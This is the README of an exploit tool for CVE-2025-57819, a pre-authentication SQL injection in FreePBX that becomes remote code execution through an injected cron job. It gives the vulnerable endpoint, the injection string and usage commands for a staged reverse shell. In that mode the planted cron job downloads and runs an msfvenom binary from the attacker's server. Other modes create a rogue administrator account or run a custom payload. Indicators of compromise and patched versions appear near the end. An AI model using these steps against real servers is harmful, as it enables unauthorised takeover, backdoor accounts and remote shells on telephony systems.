## https://sploitus.com/exploit?id=087C6F77-A5E1-5344-AD41-F986E6855C8A
# CVE-2025-57819 โ FreePBX Pre-Auth SQLi to RCE
An all-in-one exploit for **CVE-2025-57819**, an unauthenticated SQL injection in
FreePBX's endpoint module that leads to remote code execution via cron job injection.
- **CVSS**: 9.8 (Critical) โ CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **CISA KEV**: Added August 29, 2025
- **Affected**: Sangoma FreePBX 15, 16, 17 with endpoint module
โ
โผ
SQL Injection into `cron_jobs` table
(INSERT with attacker-controlled command, schedule="* * * * *")
โ
โผ
Within ~60 seconds, the cron daemon executes the command as the `asterisk` user
โ
โผ
Remote Code Execution
```
## Exploit Capabilities
This exploit supports three modes:
### 1. Staged Reverse Shell (default)
1. Generates a `linux/x64/shell_reverse_tcp` binary via `msfvenom`
2. Starts an HTTP server to serve the binary
3. Starts a TCP listener for the shell
4. Injects a cron job via SQLi that downloads + executes the binary
5. When the cron fires, you get an interactive shell
6. Cleans up the injected cron job on exit
```
python3 cve_2025_57819_aio.py
```
**Example:**
```
python3 cve_2025_57819_aio.py http://freepbx.internal 10.10.14.85 4452
```
This uses port 4452 for the reverse shell and 4453 for the HTTP stage server.
### 2. Admin User Creation (`--create-user`)
Creates a new FreePBX administrator account via SQLi. No reverse shell, no
reachback, no binaries required.
```
python3 cve_2025_57819_aio.py http://freepbx.internal --create-user
```
### 3. Custom Payload (`--payload `)
Use your own ELF binary instead of generating one with msfvenom.
```
python3 cve_2025_57819_aio.py http://freepbx.internal 10.10.14.85 4452 \
--payload /path/to/custom_shell.elf
```
## Requirements
- Python 3.6+
- `requests` library (`pip install requests`)
- **For staged mode**: Metasploit (`msfvenom`) or a custom payload with `--payload`
- **For `--create-user` mode**: Nothing beyond Python + requests
## How it works
### SQL Injection vector
The vulnerable endpoint is:
```
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=XXX&model=XXX&brand=
```
The `brand` parameter is concatenated into a SQL INSERT without sanitization.
The exploit crafts the injection as:
```sql
';INSERT INTO cron_jobs (modulename,jobname,command,...) VALUES ('X','Y','',NULL,'* * * * *',30,1,1) --
```
The trailing `--` comments out the remainder of the original query.
### Cron execution
FreePBX uses the Asterisk cron subsystem. Cron jobs are checked every minute.
When the inserted job's schedule (`* * * * *`) matches, the command runs as the
`asterisk` system user.
### Cleanup
After the session ends (or on timeout), the exploit sends a DELETE SQLi to remove
the injected cron job from `cron_jobs`.
## Indicators of Compromise
- Unexpected entries in `asterisk.cron_jobs` with random module/job names
- Outbound HTTP requests from the FreePBX server to external IPs on high ports
- Reverse shell connections from the `asterisk` user
- Random new admin accounts in `ampusers` (if `--create-user` mode)
## Mitigation
Update the endpoint module to patched versions:
- **15**: >= 15.0.66
- **16**: >= 16.0.89
- **17**: >= 17.0.3
## References
- [NVD โ CVE-2025-57819](https://nvd.nist.gov/vuln/detail/CVE-2025-57819)
- [GitHub Security Advisory โ GHSA-m42g-xg4c-5f3h](https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h)
- [CISA Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-57819)
- [watchTowr Labs](https://labs.watchtowr.com/)
- [FreePBX Community Advisory](https://community.freepbx.org/t/security-advisory-please-lock-down-your-administrator-access/107203)
## Disclaimer
This software is provided for educational and authorized security testing purposes
only. Unauthorized use against systems you do not own or have explicit permission
to test is illegal. The author is not responsible for any misuse.